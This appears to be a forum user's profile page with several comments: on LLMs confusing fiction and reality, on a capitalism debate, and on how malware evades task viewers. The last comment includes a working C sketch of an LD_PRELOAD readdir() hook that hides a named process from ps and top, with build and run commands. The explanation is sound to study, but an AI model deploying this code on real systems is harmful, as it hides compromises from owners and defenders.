E-skating cyclist, gamer, and enjoyer of anime. Probably an artist. Also I code sometimes, pretty much just to mod Titanfall 2 tho.

Introverted, yet I enjoy discussion to a fault.

  • 0 Posts
  • 102 Comments
Joined 1 year ago
Cake day: June 13th, 2023

  • There’s also the fact that they can’t tell reality apart from fiction in general, because they don’t understand anything in the first place.

LLMs have no way of differentiating fantasy RPG elements from IRL things, so they can suddenly lose the plot of what is being discussed, for seemingly no reason.

LLMs don’t just “learn” facts from their training data. They learn how to pretend to be thinking; they can mimic, but not really comprehend. If facts were present in the training data, they can regurgitate them, but they don’t actually know which facts apply to which subjects, or when not to make some up.

  • That is some serious “capitalism can solve anything and therefore will, if only we let it”-type brain rot.

    This “solution” relies on so many assumptions that don’t even begin to hold water.

Of course any utopian framework for society could, on paper, deal with every conceivable problem… But in practice none does, and each requires intentional regulation, to a greater or lesser extent, to prevent harm, because humans are humans.

    This particular potential problem is almost certainly not the kind that simply “solves itself” if you let it.

And IMO suggesting otherwise is an irresponsible perpetuation of the kind of thinking that has put human civilization on course for millions starving within the next few decades, due to the entirely predictable environmental destruction of arable land.

  • Depends on the malware.

With total access, nothing would prevent the malicious code from modifying the task viewer itself so that it ignores the resources the malware is using.

Accounting for every way the malware might be discovered is difficult, but with enough system access, hiding from all of them is possible (one classic example is sketched below).
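
    As a concrete illustration (my own sketch of a well-known Linux trick, not anything specific from the comment above): tools like ps and top list processes by reading /proc, so a shared library injected with LD_PRELOAD can hook readdir() and silently skip the entries belonging to one process. The process name evil_proc and the file name hide.c are made up for the example.

```c
/* hide.c — minimal sketch of the classic LD_PRELOAD process-hiding trick.
 * Build:  gcc -shared -fPIC hide.c -o hide.so -ldl
 * Use:    LD_PRELOAD=./hide.so ps aux   (the hidden process no longer appears)
 * A real rootkit would also verify that dirp refers to /proc and would
 * hook readdir64() as well; this sketch keeps only the core idea.
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>

#define HIDDEN_NAME "evil_proc" /* hypothetical process name to hide */

/* Check whether a /proc PID directory belongs to the process we hide. */
static int matches_hidden(const char *pid_dir) {
    char path[512], comm[256];
    snprintf(path, sizeof(path), "/proc/%s/comm", pid_dir);
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    int hit = fgets(comm, sizeof(comm), f) != NULL &&
              strncmp(comm, HIDDEN_NAME, strlen(HIDDEN_NAME)) == 0;
    fclose(f);
    return hit;
}

/* Our readdir() shadows libc's; dlsym(RTLD_NEXT) finds the real one. */
struct dirent *readdir(DIR *dirp) {
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (!real_readdir)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");

    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL) {
        /* Process entries in /proc are all-numeric PID names. */
        if (e->d_name[0] >= '0' && e->d_name[0] <= '9' &&
            matches_hidden(e->d_name))
            continue; /* pretend this process doesn't exist */
        return e;
    }
    return NULL;
}
```

    Any detection tool that reads /proc from inside the compromised system sees only what the hook lets it see, which is the point above: with enough access, the malware controls the measurement itself.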